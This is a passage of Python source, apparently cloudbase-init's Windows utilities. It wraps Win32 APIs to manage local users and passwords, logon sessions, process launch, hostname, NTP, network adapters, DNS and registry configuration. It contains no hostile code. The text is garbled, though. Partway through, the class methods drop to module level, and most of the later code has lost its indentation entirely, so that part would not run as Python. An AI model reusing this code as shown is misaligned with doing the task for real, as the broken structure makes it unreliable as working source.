ntdll.RtlVerifyVersionInfo.restype = wintypes.DWORD
kernel32.VerSetConditionMask.argtypes = [wintypes.ULARGE_INTEGER,
                                         wintypes.DWORD,
                                         wintypes.BYTE]
kernel32.VerSetConditionMask.restype = wintypes.ULARGE_INTEGER
kernel32.SetComputerNameExW.argtypes = [ctypes.c_int, wintypes.LPCWSTR]
kernel32.SetComputerNameExW.restype = wintypes.BOOL
# Drive/volume enumeration and device I/O.
kernel32.GetLogicalDriveStringsW.argtypes = [wintypes.DWORD, wintypes.LPWSTR]
kernel32.GetLogicalDriveStringsW.restype = wintypes.DWORD
kernel32.GetDriveTypeW.argtypes = [wintypes.LPCWSTR]
kernel32.GetDriveTypeW.restype = wintypes.UINT
kernel32.CreateFileW.argtypes = [wintypes.LPCWSTR, wintypes.DWORD,
                                 wintypes.DWORD, wintypes.LPVOID,
                                 wintypes.DWORD, wintypes.DWORD,
                                 wintypes.HANDLE]
kernel32.CreateFileW.restype = wintypes.HANDLE
kernel32.DeviceIoControl.argtypes = [wintypes.HANDLE, wintypes.DWORD,
                                     wintypes.LPVOID, wintypes.DWORD,
                                     wintypes.LPVOID, wintypes.DWORD,
                                     ctypes.POINTER(wintypes.DWORD),
                                     wintypes.LPVOID]
kernel32.DeviceIoControl.restype = wintypes.BOOL
# Process heap allocation helpers.
kernel32.GetProcessHeap.argtypes = []
kernel32.GetProcessHeap.restype = wintypes.HANDLE
kernel32.HeapAlloc.argtypes = [wintypes.HANDLE, wintypes.DWORD,
                               ctypes.c_size_t]
kernel32.HeapAlloc.restype = wintypes.LPVOID
kernel32.HeapFree.argtypes = [wintypes.HANDLE, wintypes.DWORD,
                              wintypes.LPVOID]
kernel32.HeapFree.restype = wintypes.BOOL
kernel32.GetVolumeNameForVolumeMountPointW.argtypes = [wintypes.LPCWSTR,
                                                       wintypes.LPWSTR,
                                                       wintypes.DWORD]
kernel32.GetVolumeNameForVolumeMountPointW.restype = wintypes.BOOL
kernel32.GetVolumePathNamesForVolumeNameW.argtypes = [wintypes.LPCWSTR,
                                                      wintypes.LPWSTR,
                                                      wintypes.DWORD,
                                                      ctypes.POINTER(
                                                          wintypes.DWORD)]
kernel32.GetVolumePathNamesForVolumeNameW.restype = wintypes.BOOL
kernel32.FindFirstVolumeW.argtypes = [wintypes.LPWSTR, wintypes.DWORD]
kernel32.FindFirstVolumeW.restype = wintypes.HANDLE
kernel32.FindNextVolumeW.argtypes = [wintypes.HANDLE,
                                     wintypes.LPWSTR,
                                     wintypes.DWORD]
kernel32.FindNextVolumeW.restype = wintypes.BOOL
kernel32.FindVolumeClose.argtypes = [wintypes.HANDLE]
kernel32.FindVolumeClose.restype = wintypes.BOOL
# IPv4 routing table access.
iphlpapi.GetIpForwardTable.argtypes = [
    ctypes.POINTER(Win32_MIB_IPFORWARDTABLE),
    ctypes.POINTER(wintypes.ULONG),
    wintypes.BOOL]
iphlpapi.GetIpForwardTable.restype = wintypes.DWORD
Ws2_32.inet_ntoa.restype = ctypes.c_char_p
# Current user name in SAM-compatible format.
secur32.GetUserNameExW.argtypes = [wintypes.DWORD,
                                   wintypes.LPWSTR,
                                   ctypes.POINTER(wintypes.ULONG)]
secur32.GetUserNameExW.restype = wintypes.BOOL
# SetupAPI device-interface enumeration (used for disk discovery).
setupapi.SetupDiGetClassDevsW.argtypes = [ctypes.POINTER(disk.GUID),
                                          wintypes.LPCWSTR,
                                          wintypes.HANDLE,
                                          wintypes.DWORD]
setupapi.SetupDiGetClassDevsW.restype = wintypes.HANDLE
setupapi.SetupDiEnumDeviceInterfaces.argtypes = [
    wintypes.HANDLE,
    wintypes.LPVOID,
    ctypes.POINTER(disk.GUID),
    wintypes.DWORD,
    ctypes.POINTER(Win32_SP_DEVICE_INTERFACE_DATA)]
setupapi.SetupDiEnumDeviceInterfaces.restype = wintypes.BOOL
setupapi.SetupDiGetDeviceInterfaceDetailW.argtypes = [
    wintypes.HANDLE,
    ctypes.POINTER(Win32_SP_DEVICE_INTERFACE_DATA),
    ctypes.POINTER(Win32_SP_DEVICE_INTERFACE_DETAIL_DATA_W),
    wintypes.DWORD,
    ctypes.POINTER(wintypes.DWORD),
    wintypes.LPVOID]
setupapi.SetupDiGetDeviceInterfaceDetailW.restype = wintypes.BOOL
setupapi.SetupDiDestroyDeviceInfoList.argtypes = [wintypes.HANDLE]
setupapi.SetupDiDestroyDeviceInfoList.restype = wintypes.BOOL
# VerifyVersionInfo condition-mask constants.
VER_MAJORVERSION = 1
VER_MINORVERSION = 2
VER_BUILDNUMBER = 4
VER_GREATER_EQUAL = 3
# Device interface class GUID for disk devices.
GUID_DEVINTERFACE_DISK = disk.GUID(0x53f56307, 0xb6bf, 0x11d0, 0x94, 0xf2,
                                   0x00, 0xa0, 0xc9, 0x1e, 0xfb, 0x8b)
class WindowsUtils(base.BaseOSUtils):
    """Windows implementation of the cloudbase-init OS utilities."""
    # Win32/NetAPI error codes used by the methods below.
    NERR_GroupNotFound = 2220
    NERR_UserNotFound = 2221
    ERROR_PATH_NOT_FOUND = 3
    ERROR_ACCESS_DENIED = 5
    ERROR_INSUFFICIENT_BUFFER = 122
    ERROR_INVALID_NAME = 123
    ERROR_NO_DATA = 232
    ERROR_MORE_DATA = 234
    ERROR_NO_SUCH_MEMBER = 1387
    ERROR_MEMBER_IN_ALIAS = 1378
    ERROR_INVALID_MEMBER = 1388
    ERROR_NO_MORE_FILES = 18
    STATUS_REVISION_MISMATCH = 0xC0000059
    ADS_UF_PASSWORD_EXPIRED = 0x800000
    PASSWORD_CHANGED_FLAG = 1
    # File/device access constants.
    INVALID_HANDLE_VALUE = 0xFFFFFFFF
    FILE_SHARE_READ = 1
    FILE_SHARE_WRITE = 2
    OPEN_EXISTING = 3
    IOCTL_STORAGE_GET_DEVICE_NUMBER = 0x002D1080
    MAX_PATH = 260
    DIGCF_PRESENT = 2
    DIGCF_DEVICEINTERFACE = 0x10
    DRIVE_CDROM = 5
    INFINITE = 0xFFFFFFFF
    # Process creation / logon constants.
    CREATE_NEW_CONSOLE = 0x10
    LOGON32_LOGON_BATCH = 4
    LOGON32_LOGON_INTERACTIVE = 2
    LOGON32_LOGON_SERVICE = 5
    LOGON32_PROVIDER_DEFAULT = 0
    EXTENDED_NAME_FORMAT_SAM_COMPATIBLE = 2
    # Human-readable service states and start modes, mapped to the
    # win32service constants below.
    SERVICE_STATUS_STOPPED = "Stopped"
    SERVICE_STATUS_START_PENDING = "Start Pending"
    SERVICE_STATUS_STOP_PENDING = "Stop Pending"
    SERVICE_STATUS_RUNNING = "Running"
    SERVICE_STATUS_CONTINUE_PENDING = "Continue Pending"
    SERVICE_STATUS_PAUSE_PENDING = "Pause Pending"
    SERVICE_STATUS_PAUSED = "Paused"
    SERVICE_STATUS_UNKNOWN = "Unknown"
    SERVICE_START_MODE_AUTOMATIC = "Automatic"
    SERVICE_START_MODE_MANUAL = "Manual"
    SERVICE_START_MODE_DISABLED = "Disabled"
    _SERVICE_START_TYPE_MAP = {
        SERVICE_START_MODE_AUTOMATIC:
            win32service.SERVICE_AUTO_START,
        SERVICE_START_MODE_MANUAL:
            win32service.SERVICE_DEMAND_START,
        SERVICE_START_MODE_DISABLED:
            win32service.SERVICE_DISABLED}
    _SERVICE_STATUS_MAP = {
        win32service.SERVICE_CONTINUE_PENDING:
            SERVICE_STATUS_CONTINUE_PENDING,
        win32service.SERVICE_PAUSE_PENDING:
            SERVICE_STATUS_PAUSE_PENDING,
        win32service.SERVICE_PAUSED:
            SERVICE_STATUS_PAUSED,
        win32service.SERVICE_RUNNING:
            SERVICE_STATUS_RUNNING,
        win32service.SERVICE_START_PENDING:
            SERVICE_STATUS_START_PENDING,
        win32service.SERVICE_STOP_PENDING:
            SERVICE_STATUS_STOP_PENDING,
        win32service.SERVICE_STOPPED:
            SERVICE_STATUS_STOPPED,
    }
    ComputerNamePhysicalDnsHostname = 5
    # Registry key and service name used by cloudbase-init itself.
    _config_key = 'SOFTWARE\\Cloudbase Solutions\\Cloudbase-Init\\'
    _service_name = 'cloudbase-init'
    # Windows Firewall protocol/scope constants.
    _FW_IP_PROTOCOL_TCP = 6
    _FW_IP_PROTOCOL_UDP = 17
    _FW_SCOPE_ALL = 0
    _FW_SCOPE_LOCAL_SUBNET = 1
    VER_NT_WORKSTATION = 1
    def __init__(self):
        # Lazily-initialized network team manager (set elsewhere on demand).
        self._network_team_manager = None
    def reboot(self):
        """Reboot the machine, acquiring the shutdown privilege first."""
        with privilege.acquire_privilege(win32security.SE_SHUTDOWN_NAME):
            ret_val = advapi32.InitiateSystemShutdownExW(
                0, "Cloudbase-Init reboot",
                0, True, True, 0)
            if not ret_val:
                raise exception.WindowsCloudbaseInitException(
                    "Reboot failed: %r")
    def user_exists(self, username):
        """Return True if the local user account exists."""
        try:
            self._get_user_info(username, 1)
            return True
        except exception.ItemNotFoundException:
            # User not found
            return False
    def create_user(self, username, password, password_expires=False):
        """Create a local user account.
        :param password_expires: when False (default), the password is
            flagged to never expire.
        """
        user_info = {
            "name": username,
            "password": password,
            "priv": win32netcon.USER_PRIV_USER,
            "flags": win32netcon.UF_NORMAL_ACCOUNT | win32netcon.UF_SCRIPT,
        }
        if not password_expires:
            user_info["flags"] |= win32netcon.UF_DONT_EXPIRE_PASSWD
        try:
            win32net.NetUserAdd(None, 1, user_info)
        except win32net.error as ex:
            raise exception.CloudbaseInitException(
                "Create user failed: %s" % ex.args[2])
    def rename_user(self, username, new_username):
        """Rename a local user account.
        :raises ItemNotFoundException: if the user does not exist.
        """
        user_info = {
            "name": new_username,
        }
        try:
            win32net.NetUserSetInfo(None, username, 0, user_info)
        except win32net.error as ex:
            if ex.args[0] == self.NERR_UserNotFound:
                raise exception.ItemNotFoundException(
                    "User not found: %s" % username)
            else:
                raise exception.CloudbaseInitException(
                    "Renaming user failed: %s" % ex.args[2])
    def set_user_info(self, username, full_name=None,
                      disabled=False, expire_interval=None):
        """Update full name, enabled state and account expiration of a user.
        :param expire_interval: account expiration time, or None for never.
        :raises ItemNotFoundException: if the user does not exist.
        """
        user_info = self._get_user_info(username, 2)
        if full_name:
            user_info["full_name"] = full_name
        if disabled:
            user_info["flags"] |= win32netcon.UF_ACCOUNTDISABLE
        else:
            user_info["flags"] &= ~win32netcon.UF_ACCOUNTDISABLE
        if expire_interval is not None:
            user_info["acct_expires"] = int(expire_interval)
        else:
            user_info["acct_expires"] = win32netcon.TIMEQ_FOREVER
        try:
            win32net.NetUserSetInfo(None, username, 2, user_info)
        except win32net.error as ex:
            if ex.args[0] == self.NERR_UserNotFound:
                raise exception.ItemNotFoundException(
                    "User not found: %s" % username)
            else:
                LOG.debug(ex)
                raise exception.CloudbaseInitException(
                    "Setting user info failed: %s" % ex.args[2])
    def enum_users(self):
        """Return the names of all normal local user accounts."""
        usernames = []
        resume_handle = 0
        while True:
            try:
                # NetUserEnum is paginated; resume_handle is 0 when done.
                users_info, total, resume_handle = win32net.NetUserEnum(
                    None, 0, win32netcon.FILTER_NORMAL_ACCOUNT, resume_handle)
            except win32net.error as ex:
                raise exception.CloudbaseInitException(
                    "Enumerating users failed: %s" % ex.args[2])
            usernames += [u["name"] for u in users_info]
            if not resume_handle:
                return usernames
    def is_builtin_admin(self, username):
        """Return True if the user is the built-in Administrator (RID 500)."""
        sid = self.get_user_sid(username)
        return sid and sid.startswith(u"S-1-5-") and sid.endswith(u"-500")
    def _get_user_info(self, username, level):
        """Return NetUserGetInfo data at the given level.
        :raises ItemNotFoundException: if the user does not exist.
        """
        try:
            return win32net.NetUserGetInfo(None, username, level)
        except win32net.error as ex:
            if ex.args[0] == self.NERR_UserNotFound:
                raise exception.ItemNotFoundException(
                    "User not found: %s" % username)
            else:
                raise exception.CloudbaseInitException(
                    "Failed to get user info: %s" % ex.args[2])
    def set_user_password(self, username, password, password_expires=False):
        """Set a user's password and its expiration policy."""
        user_info = self._get_user_info(username, 1)
        user_info["password"] = password
        if password_expires:
            user_info["flags"] &= ~win32netcon.UF_DONT_EXPIRE_PASSWD
        else:
            user_info["flags"] |= win32netcon.UF_DONT_EXPIRE_PASSWD
        try:
            win32net.NetUserSetInfo(None, username, 1, user_info)
        except win32net.error as ex:
            raise exception.CloudbaseInitException(
                "Set user password failed: %s" % ex.args[2])
    def change_password_next_logon(self, username):
        """Force the given user to change the password at next logon."""
        user_info = self._get_user_info(username, 4)
        user_info["flags"] &= ~win32netcon.UF_DONT_EXPIRE_PASSWD
        user_info["password_expired"] = 1
        try:
            win32net.NetUserSetInfo(None, username, 4, user_info)
        except win32net.error as ex:
            raise exception.CloudbaseInitException(
                "Setting password expiration failed: %s" % ex.args[2])
    def group_exists(self, group):
        """Return True if the local group exists."""
        try:
            self._get_group_info(group, 1)
            return True
        except exception.ItemNotFoundException:
            # Group not found
            return False
    def _get_group_info(self, group, level):
        """Return NetLocalGroupGetInfo data at the given level.
        :raises ItemNotFoundException: if the group does not exist.
        """
        try:
            return win32net.NetLocalGroupGetInfo(None, group, level)
        except win32net.error as ex:
            if ex.args[0] == self.NERR_GroupNotFound:
                raise exception.ItemNotFoundException(
                    "Group not found: %s" % group)
            else:
                raise exception.CloudbaseInitException(
                    "Failed to get group info: %s" % ex.args[2])
    def create_group(self, group, description=None):
        """Create a local group.
        NOTE(review): 'description' is accepted but ignored — NetLocalGroupAdd
        is called at info level 0, which carries no comment field.
        """
        group_info = {"name": group}
        try:
            win32net.NetLocalGroupAdd(None, 0, group_info)
        except win32net.error as ex:
            raise exception.CloudbaseInitException(
                "Create group failed: %s" % ex.args[2])
    @staticmethod
    def _get_cch_referenced_domain_name(domain_name):
        # Buffer size in WCHARs (not bytes), as LookupAccountNameW expects.
        return wintypes.DWORD(
            ctypes.sizeof(domain_name) // ctypes.sizeof(wintypes.WCHAR))
    def _get_user_sid_and_domain(self, username):
        """Return the raw SID buffer and domain name for the given account."""
        sid = ctypes.create_string_buffer(1024)
        cbSid = wintypes.DWORD(ctypes.sizeof(sid))
        domainName = ctypes.create_unicode_buffer(1024)
        cchReferencedDomainName = self._get_cch_referenced_domain_name(
            domainName)
        sidNameUse = wintypes.DWORD()
        ret_val = advapi32.LookupAccountNameW(
            0, six.text_type(username), sid, ctypes.byref(cbSid), domainName,
            ctypes.byref(cchReferencedDomainName), ctypes.byref(sidNameUse))
        if not ret_val:
            raise exception.WindowsCloudbaseInitException(
                "Cannot get user SID: %r")
        return sid, domainName.value
    def add_user_to_local_group(self, username, groupname):
        """Add an existing user to a local group.
        Adding a user that is already a member is a silent no-op
        (ERROR_MEMBER_IN_ALIAS).
        """
        lmi = Win32_LOCALGROUP_MEMBERS_INFO_3()
        lmi.lgrmi3_domainandname = six.text_type(username)
        ret_val = netapi32.NetLocalGroupAddMembers(0, six.text_type(groupname),
                                                   3, ctypes.pointer(lmi), 1)
        if ret_val == self.NERR_GroupNotFound:
            raise exception.CloudbaseInitException("Group '%s' not found"
                                                   % groupname)
        elif ret_val == self.ERROR_ACCESS_DENIED:
            raise exception.CloudbaseInitException('Access denied')
        elif ret_val == self.ERROR_NO_SUCH_MEMBER:
            raise exception.CloudbaseInitException("Username '%s' not found"
                                                   % username)
        elif ret_val == self.ERROR_MEMBER_IN_ALIAS:
            # The user is already a member of the group
            pass
        elif ret_val == self.ERROR_INVALID_MEMBER:
            raise exception.CloudbaseInitException('Invalid user')
        elif ret_val != 0:
            raise exception.CloudbaseInitException('Unknown error')
    def get_user_sid(self, username):
        """Return the user's SID as a string, or None if the user is missing."""
        try:
            user_info = self._get_user_info(username, 4)
            # Strip the "PySID:" prefix from the pywin32 string representation.
            return str(user_info["user_sid"])[6:]
        except exception.ItemNotFoundException:
            # User not found
            pass
    def create_user_logon_session(self, username, password, domain='.',
                                  load_profile=True,
                                  logon_type=LOGON32_LOGON_INTERACTIVE):
        """Log a user on and return the logon session token handle.
        :param load_profile: when True, also load the user's profile so
            HKCU and environment data are available to spawned processes.
        :raises WindowsCloudbaseInitException: on logon or profile failure.
        """
        LOG.debug("Creating logon session for user: %(domain)s\\%(username)s",
                  {"username": username, "domain": domain})
        token = wintypes.HANDLE()
        ret_val = advapi32.LogonUserW(six.text_type(username),
                                      six.text_type(domain),
                                      six.text_type(password),
                                      logon_type,
                                      self.LOGON32_PROVIDER_DEFAULT,
                                      ctypes.byref(token))
        if not ret_val:
            raise exception.WindowsCloudbaseInitException(
                "User logon failed: %r")
        if load_profile:
            pi = Win32_PROFILEINFO()
            pi.dwSize = ctypes.sizeof(Win32_PROFILEINFO)
            pi.lpUserName = six.text_type(username)
            ret_val = userenv.LoadUserProfileW(token, ctypes.byref(pi))
            if not ret_val:
                # Don't leak the logon token on failure.
                kernel32.CloseHandle(token)
                raise exception.WindowsCloudbaseInitException(
                    "Cannot load user profile: %r")
        return token
    def get_current_user(self):
        """Get the user account name from the underlying instance.
        :return: [domain, username] from the SAM-compatible "DOMAIN\\user" form.
        """
        buf_len = wintypes.ULONG(512)
        buf = ctypes.create_unicode_buffer(512)
        ret_val = secur32.GetUserNameExW(
            self.EXTENDED_NAME_FORMAT_SAM_COMPATIBLE,
            buf, ctypes.byref(buf_len))
        if not ret_val:
            raise exception.WindowsCloudbaseInitException(
                "GetUserNameExW failed: %r")
        return buf.value.split("\\")
    def execute_process_as_user(self, token, args, wait=True,
                                new_console=False):
        """Executes processes as an user.
        :param token: Represents the user logon session token, resulted from
                      running the 'create_user_logon_session' method.
        :param args: The arguments with which the process will be run with.
        :param wait: Specifies if it's needed to wait for the process
                     handler to finish up running all the operations
                     on the process object.
        :param new_console: Specifies whether the process should run
                            under a new console or not.
        :return: The exit code value resulted from the running process.
        :rtype: int
        """
        LOG.debug("Executing process as user, command line: %s", args)
        proc_info = Win32_PROCESS_INFORMATION()
        startup_info = Win32_STARTUPINFO_W()
        startup_info.cb = ctypes.sizeof(Win32_STARTUPINFO_W)
        startup_info.lpDesktop = ""
        flags = self.CREATE_NEW_CONSOLE if new_console else 0
        # Quote/escape the argument list into a single Windows command line.
        cmdline = ctypes.create_unicode_buffer(subprocess.list2cmdline(args))
        try:
            ret_val = advapi32.CreateProcessAsUserW(
                token, None, cmdline, None, None, False, flags, None, None,
                ctypes.byref(startup_info), ctypes.byref(proc_info))
            if not ret_val:
                raise exception.WindowsCloudbaseInitException(
                    "CreateProcessAsUserW failed: %r")
            if wait and proc_info.hProcess:
                kernel32.WaitForSingleObject(
                    proc_info.hProcess, self.INFINITE)
                exit_code = wintypes.DWORD()
                if not kernel32.GetExitCodeProcess(
                        proc_info.hProcess, ctypes.byref(exit_code)):
                    raise exception.WindowsCloudbaseInitException(
                        "GetExitCodeProcess failed: %r")
                return exit_code.value
        finally:
            # Always release the process and thread handles.
            if proc_info.hProcess:
                kernel32.CloseHandle(proc_info.hProcess)
            if proc_info.hThread:
                kernel32.CloseHandle(proc_info.hThread)
    def close_user_logon_session(self, token):
        """Release a logon token obtained from create_user_logon_session."""
        kernel32.CloseHandle(token)
    def get_user_home(self, username):
        """Return the user's profile directory from the registry, or None."""
        user_sid = self.get_user_sid(username)
        if user_sid:
            with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, 'SOFTWARE\\'
                                'Microsoft\\Windows NT\\CurrentVersion\\'
                                'ProfileList\\%s' % user_sid) as key:
                return winreg.QueryValueEx(key, 'ProfileImagePath')[0]
        LOG.debug('Home directory not found for user %r', username)
        return None
    def sanitize_shell_input(self, value):
        # Escape double quotes; the value is meant to be embedded in a
        # quoted shell argument.
        return value.replace('"', '\\"')
    def set_host_name(self, new_host_name):
        """Set the machine's DNS hostname; a reboot is needed to apply it."""
        ret_val = kernel32.SetComputerNameExW(
            self.ComputerNamePhysicalDnsHostname,
            six.text_type(new_host_name))
        if not ret_val:
            raise exception.WindowsCloudbaseInitException(
                "Cannot set host name: %r")
        return True
    def get_network_adapters(self):
        """Return available adapters as a list of tuples of (name, mac)."""
        conn = wmi.WMI(moniker='//./root/cimv2')
        # Get Ethernet adapters only
        wql = ('SELECT * FROM Win32_NetworkAdapter WHERE '
               'AdapterTypeId = 0 AND MACAddress IS NOT NULL')
        # PhysicalAdapter is only available from Windows Vista (6.0) on.
        if self.check_os_version(6, 0):
            wql += ' AND PhysicalAdapter = True'
        q = conn.query(wql)
        return [(r.NetConnectionID, r.MACAddress) for r in q]
    def get_dhcp_hosts_in_use(self):
        """Return (friendly_name, mac, dhcp_server) for DHCP-enabled adapters."""
        dhcp_hosts = []
        for net_addr in network.get_adapter_addresses():
            if net_addr["dhcp_enabled"] and net_addr["dhcp_server"]:
                dhcp_hosts.append((net_addr["friendly_name"],
                                   net_addr["mac_address"],
                                   net_addr["dhcp_server"]))
        return dhcp_hosts
    def set_ntp_client_config(self, ntp_hosts):
        """Configure the Windows Time service with a manual NTP peer list."""
        base_dir = self._get_system_dir()
        w32tm_path = os.path.join(base_dir, "w32tm.exe")
        # Convert the NTP hosts list to a string, in order to pass
        # it to w32tm.
        ntp_hosts = ",".join(ntp_hosts)
        args = [w32tm_path, '/config', '/manualpeerlist:%s' % ntp_hosts,
                '/syncfromflags:manual', '/update']
        (out, err, ret_val) = self.execute_process(args, shell=False)
        if ret_val:
            raise exception.CloudbaseInitException(
                'w32tm failed to configure NTP.\nOutput: %(out)s\nError:'
                ' %(err)s' % {'out': out, 'err': err})
def get_network_adapter_name_by_mac_address(self, mac_address):
    """Return the friendly name of the single adapter whose MAC
    address matches *mac_address* (compared case-insensitively).

    Raises ItemNotFoundException when no adapter matches and
    CloudbaseInitException when more than one does.
    """
    wanted_mac = mac_address.lower()
    # The original local was named iface_index_list, but it holds the
    # full adapter dicts, not interface indexes.
    matching_adapters = [
        adapter for adapter in network.get_adapter_addresses()
        if adapter["mac_address"] is not None and
        adapter["mac_address"].lower() == wanted_mac]
    if not matching_adapters:
        raise exception.ItemNotFoundException(
            'Network interface with MAC address "%s" not found' %
            mac_address)
    if len(matching_adapters) > 1:
        raise exception.CloudbaseInitException(
            'Multiple network interfaces with MAC address "%s" exist' %
            mac_address)
    return matching_adapters[0]["friendly_name"]
@retry_decorator.retry_decorator(
max_retry_count=3, exceptions=exception.ItemNotFoundException)
def set_network_adapter_mtu(self, name, mtu):
if not self.check_os_version(6, 0):
raise exception.CloudbaseInitException(
'Setting the MTU is currently not supported on Windows XP '
'and Windows Server 2003')
iface_index_list = [
net_addr["interface_index"] for net_addr
in network.get_adapter_addresses()
if net_addr["friendly_name"] == name]
if not iface_index_list:
raise exception.ItemNotFoundException(
'Network interface with name "%s" not found' %
name)
else:
iface_index = iface_index_list[0]
LOG.debug('Setting MTU for interface "%(name)s" with '
'value "%(mtu)s"',
{'name': name, 'mtu': mtu})
base_dir = self._get_system_dir()
netsh_path = os.path.join(base_dir, 'netsh.exe')
args = [netsh_path, "interface", "ipv4", "set", "subinterface",
str(iface_index), "mtu=%s" % mtu,
"store=persistent"]
(out, err, ret_val) = self.execute_process(args, shell=False)
if ret_val:
raise exception.CloudbaseInitException(
'Setting MTU for interface "%(name)s" with '
'value "%(mtu)s" failed' % {'name': name, 'mtu': mtu})
def rename_network_adapter(self, old_name, new_name):
base_dir = self._get_system_dir()
netsh_path = os.path.join(base_dir, 'netsh.exe')
args = [netsh_path, "interface", "set", "interface",
'name=%s' % old_name, 'newname=%s' % new_name]
(out, err, ret_val) = self.execute_process(args, shell=False)
if ret_val:
raise exception.CloudbaseInitException(
'Renaming interface "%(old_name)s" to "%(new_name)s" '
'failed' % {'old_name': old_name, 'new_name': new_name})
@staticmethod
def _get_network_adapter(name):
conn = wmi.WMI(moniker='//./root/cimv2')
query = conn.Win32_NetworkAdapter(NetConnectionID=name)
if not len(query):
raise exception.CloudbaseInitException(
"Network adapter not found: %s" % name)
return query[0]
@staticmethod
def _set_static_network_config_legacy(name, address, netmask, gateway,
dnsnameservers):
if netaddr.valid_ipv6(address):
LOG.warning("Setting IPv6 info not available on this system")
return
adapter_config = WindowsUtils._get_network_adapter(name).associators(
wmi_result_class='Win32_NetworkAdapterConfiguration')[0]
LOG.debug("Setting static IP address")
(ret_val,) = adapter_config.EnableStatic([address], [netmask])
if ret_val > 1:
raise exception.CloudbaseInitException(
"Cannot set static IP address on network adapter: %d" %
ret_val)
reboot_required = (ret_val == 1)
if gateway:
LOG.debug("Setting static gateways")
(ret_val,) = adapter_config.SetGateways([gateway], [1])
if ret_val > 1:
raise exception.CloudbaseInitException(
"Cannot set gateway on network adapter: %d" % ret_val)
reboot_required = reboot_required or ret_val == 1
if dnsnameservers:
LOG.debug("Setting static DNS servers")
(ret_val,) = adapter_config.SetDNSServerSearchOrder(dnsnameservers)
if ret_val > 1:
raise exception.CloudbaseInitException(
"Cannot set DNS on network adapter: %d" % ret_val)
reboot_required = reboot_required or ret_val == 1
return reboot_required
@staticmethod
def _fix_network_adapter_dhcp(interface_name, enable_dhcp, address_family):
interface_id = WindowsUtils._get_network_adapter(interface_name).GUID
tcpip_key = "Tcpip6" if address_family == AF_INET6 else "Tcpip"
with winreg.OpenKey(
winreg.HKEY_LOCAL_MACHINE,
"SYSTEM\\CurrentControlSet\\services\\%(tcpip_key)s\\"
"Parameters\\Interfaces\\%(interface_id)s" %
{"tcpip_key": tcpip_key, "interface_id": interface_id},
0, winreg.KEY_SET_VALUE) as key:
winreg.SetValueEx(
key, 'EnableDHCP', 0, winreg.REG_DWORD,
1 if enable_dhcp else 0)
@staticmethod
def _set_interface_dns(interface_name, dnsnameservers):
# Import here to avoid loading errors on Windows versions where MI is
# not available
import mi
conn = wmi.WMI(moniker='//./root/standardcimv2')
# Requires Windows >= 6.2
dns_client = conn.MSFT_DnsClientServerAddress(
InterfaceAlias=interface_name)
if not len(dns_client):
raise exception.ItemNotFoundException(
'Network interface with name "%s" not found' %
interface_name)
dns_client = dns_client[0]
custom_options = [{
u'name': u'ServerAddresses',
u'value_type': mi.MI_ARRAY | mi.MI_STRING,
u'value': dnsnameservers
}]
operation_options = {u'custom_options': custom_options}
dns_client.put(operation_options=operation_options)
def enable_network_adapter(self, name, enabled):
adapter = self._get_network_adapter(name)
if enabled:
adapter.Enable()
else:
adapter.Disable()
@staticmethod
def _set_static_network_config(name, address, prefix_len, gateway):
if netaddr.valid_ipv6(address):
family = AF_INET6
else:
family = AF_INET
# This is needed to avoid the error:
# "Inconsistent parameters PolicyStore PersistentStore and
# Dhcp Enabled"
WindowsUtils._fix_network_adapter_dhcp(name, False, family)
conn = wmi.WMI(moniker='//./root/standardcimv2')
existing_addresses = conn.MSFT_NetIPAddress(
AddressFamily=family, InterfaceAlias=name)
for existing_address in existing_addresses:
LOG.debug(
"Removing existing IP address \"%(ip)s\" "
"from adapter \"%(name)s\"",
{"ip": existing_address.IPAddress, "name": name})
existing_address.Delete_()
existing_routes = conn.MSFT_NetRoute(
AddressFamily=family, InterfaceAlias=name)
for existing_route in existing_routes:
LOG.debug(
"Removing existing route \"%(route)s\" "
"from adapter \"%(name)s\"",
{"route": existing_route.DestinationPrefix, "name": name})
existing_route.Delete_()
conn.MSFT_NetIPAddress.create(
AddressFamily=family, InterfaceAlias=name, IPAddress=address,
PrefixLength=prefix_len, DefaultGateway=gateway)
def set_static_network_config(self, name, address, prefix_len_or_netmask,
gateway, dnsnameservers):
ip_network = netaddr.IPNetwork(
u"%s/%s" % (address, prefix_len_or_netmask))
prefix_len = ip_network.prefixlen
netmask = str(ip_network.netmask)
if self.check_os_version(6, 2):
self._set_static_network_config(
name, address, prefix_len, gateway)
if len(dnsnameservers):
self._set_interface_dns(name, dnsnameservers)
else:
return self._set_static_network_config_legacy(
name, address, netmask, gateway, dnsnameservers)
def _get_network_team_manager(self):
if self._network_team_manager:
return self._network_team_manager
team_managers = [
"cloudbaseinit.utils.windows.netlbfo.NetLBFOTeamManager",
]
cl = classloader.ClassLoader()
for class_name in team_managers:
try:
cls = cl.load_class(class_name)
if cls.is_available():
self._network_team_manager = cls()
return self._network_team_manager
except Exception as ex:
LOG.exception(ex)
raise exception.ItemNotFoundException(
"No network team manager available")
def create_network_team(self, team_name, mode, load_balancing_algorithm,
members, mac_address, primary_nic_name=None,
primary_nic_vlan_id=None, lacp_timer=None):
self._get_network_team_manager().create_team(
team_name, mode, load_balancing_algorithm, members, mac_address,
primary_nic_name, primary_nic_vlan_id, lacp_timer)
def add_network_team_nic(self, team_name, nic_name, vlan_id):
self._get_network_team_manager().add_team_nic(
team_name, nic_name, vlan_id)
def _get_config_key_name(self, section):
key_name = self._config_key
if section:
key_name += section.replace('/', '\\') + '\\'
return key_name
def set_config_value(self, name, value, section=None):
    """Write *value* under *name* in this service's registry
    configuration key, creating the key if needed.

    Integers are stored as REG_DWORD; everything else as REG_SZ.
    """
    key_name = self._get_config_key_name(section)
    with winreg.CreateKey(winreg.HKEY_LOCAL_MACHINE,
                          key_name) as key:
        # isinstance is the idiomatic type check. bool is excluded
        # explicitly because it subclasses int and the original
        # `type(value) == int` check did not treat it as a DWORD.
        if isinstance(value, int) and not isinstance(value, bool):
            regtype = winreg.REG_DWORD
        else:
            regtype = winreg.REG_SZ
        winreg.SetValueEx(key, name, 0, regtype, value)
def get_config_value(self, name, section=None):
    """Read *name* from this service's registry configuration key.

    Returns the stored value, or None when the key or value does not
    exist (any WindowsError is treated as "not set").
    """
    key_name = self._get_config_key_name(section)
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
                            key_name) as key:
            (value, regtype) = winreg.QueryValueEx(key, name)
            return value
    except WindowsError:
        return None
def wait_for_boot_completion(self):
try:
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
"SYSTEM\\Setup\\Status\\SysprepStatus", 0,
winreg.KEY_READ) as key:
while True:
gen_state = winreg.QueryValueEx(key,
"GeneralizationState")[0]
if gen_state == 7:
break
time.sleep(1)
